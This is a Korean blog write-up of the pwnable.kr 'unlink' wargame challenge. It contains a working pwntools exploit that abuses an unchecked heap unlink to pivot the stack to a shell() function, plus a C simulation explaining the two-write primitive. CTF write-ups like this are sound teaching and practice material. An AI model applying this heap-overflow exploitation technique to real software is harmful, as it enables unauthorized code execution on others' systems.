Wargame/pwnable.kr

pwnable.kr unlink

공부하자~~ 2018. 6. 21. 02:23



payload

from pwn import *

p = process('/home/unlink/unlink')

# The binary prints &A (stack) and A (heap) before reading into A->buf.
p.recvuntil(b"here is stack address leak:")
stackAddr = int(p.recvline(keepends=False), 16)

p.recvuntil(b"here is heap address leak:")
heapAddr = int(p.recvline(keepends=False), 16)

shell = 0x080484eb                  # address of shell() in the binary

payload  = p32(shell)               # A->buf (heap+0x8): what the final ret pops
payload += b"A" * 12                # rest of A->buf + B's chunk header (prev_size, size)
payload += p32(heapAddr + 0xc)      # B->fd: FD->bk = BK lands in B's prev_size (harmless)
payload += p32(stackAddr + 0x10)    # B->bk: BK->fd = FD overwrites main's saved ecx with heap+0xc
                                    # epilogue: lea esp,[ecx-4] -> esp = heap+0x8, ret -> shell()

p.sendline(payload)                 # gets() needs the trailing newline
p.interactive()
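To show why the four fields of the payload are laid out the way they are, here is an added C model of the unlink write primitive; it is not code from the post or from pwnable.kr. It reconstructs the challenge's OBJ node (fd, bk, buf[8]) and its unchecked unlink() (FD->bk = BK; BK->fd = FD) over a flat simulated memory, then replays the overflow, the unlink and main's epilogue. It assumes, from the offsets the payload uses, that main returns through mov ecx,[ebp-4]; leave; lea esp,[ecx-4]; ret with [ebp-4] at the stack leak + 0x10, and that B's user data starts 0x18 bytes after A's (malloc(16) on 32-bit glibc gives a 24-byte chunk). The leak values 0x10 and 0x80 are constructed offsets, not real addresses; the shell() address is the one from the payload.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated values for the two leaks and the shell() address from the page's
 * payload. The leak values are constructed offsets into `mem`, not real ones. */
#define HEAP_LEAK  0x10u          /* A  (heap leak) */
#define STACK_LEAK 0x80u          /* &A (stack leak) */
#define SHELL_ADDR 0x080484ebu    /* shell() in the unlink binary */

/* Flat simulated 32-bit address space; "addresses" are byte offsets into it,
 * so the model behaves identically on a 64-bit host. */
static unsigned char mem[0x100];

static uint32_t rd32(uint32_t addr) { uint32_t v; memcpy(&v, mem + addr, 4); return v; }
static void     wr32(uint32_t addr, uint32_t v) { memcpy(mem + addr, &v, 4); }

/* Node layout from the challenge: struct { OBJ *fd; OBJ *bk; char buf[8]; }.
 * fd is at +0, bk at +4, buf at +8. The challenge's unlink() performs
 * FD->bk = BK; BK->fd = FD; with no sanity check on either link. */
static void unlink_node(uint32_t P) {
    uint32_t FD = rd32(P + 0);
    uint32_t BK = rd32(P + 4);
    wr32(FD + 4, BK);   /* FD->bk = BK : writes BK into *(FD+4) */
    wr32(BK + 0, FD);   /* BK->fd = FD : writes FD into *(BK)   */
}

/* Same 24-byte payload as the Python exploit above. */
static void build_payload(unsigned char out[24], uint32_t heap, uint32_t stack) {
    uint32_t fd = heap + 0xc, bk = stack + 0x10, shell = SHELL_ADDR;
    memcpy(out, &shell, 4);          /* A->buf[0..4]  (heap+0x8) */
    memset(out + 4, 'A', 12);        /* A->buf[4..8] + B's chunk header (prev_size, size) */
    memcpy(out + 16, &fd, 4);        /* B->fd  (heap+0x18) */
    memcpy(out + 20, &bk, 4);        /* B->bk  (heap+0x1c) */
}

/* Replays gets(A->buf); unlink(B); and main's epilogue, returning the
 * address that the final `ret` pops. Assumption (from the payload's offsets):
 * main ends with mov ecx,[ebp-4]; leave; lea esp,[ecx-4]; ret and [ebp-4]
 * lives at STACK_LEAK + 0x10. B's user data starts 0x18 past A's because
 * malloc(16) on 32-bit glibc yields a 24-byte chunk. */
static uint32_t simulate(void) {
    unsigned char payload[24];
    memset(mem, 0, sizeof mem);
    build_payload(payload, HEAP_LEAK, STACK_LEAK);
    memcpy(mem + HEAP_LEAK + 8, payload, sizeof payload);   /* gets(A->buf) overflow */
    unlink_node(HEAP_LEAK + 0x18);                          /* unlink(B) */
    uint32_t ecx = rd32(STACK_LEAK + 0x10);                 /* mov ecx,[ebp-4] -> heap+0xc */
    uint32_t esp = ecx - 4;                                 /* lea esp,[ecx-4] -> heap+0x8 */
    return rd32(esp);                                       /* ret pops *(heap+0x8) */
}

/* Where the "mirror" write lands: unlink cannot do one write without the
 * other, so the chosen FD must point somewhere writable that nothing
 * depends on. Here FD+4 = heap+0x10 is B's prev_size field. */
static uint32_t mirror_write_value(void) { return rd32(HEAP_LEAK + 0x10); }

int main(void) {
    uint32_t target = simulate();
    printf("ret jumps to 0x%08x (shell() is 0x%08x)\n", target, SHELL_ADDR);
    printf("mirror write put 0x%08x into heap+0x10 (B prev_size)\n", mirror_write_value());
    return target == SHELL_ADDR ? 0 : 1;
}
```

The point the model makes explicit is the constraint of an unchecked unlink: you get two writes, not one, and each pointer you supply is also written into the other's neighbour. Picking FD = heap+0xc makes the unwanted write hit a chunk header field that is never read again, while BK = stack+0x10 plants heap+0xc in the slot main reloads into ecx, so the stack pivot lands on the shell() address stored at the start of A->buf.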


References

http://www.hackerschool.org/HS_Boards/data/Lib_system/dfb_leon.txt

https://bpsecblog.wordpress.com/2016/10/06/heap_vuln/

http://nroses-taek.tistory.com/160

https://delspon.wordpress.com/2017/07/07/pwnable-kr-unlink/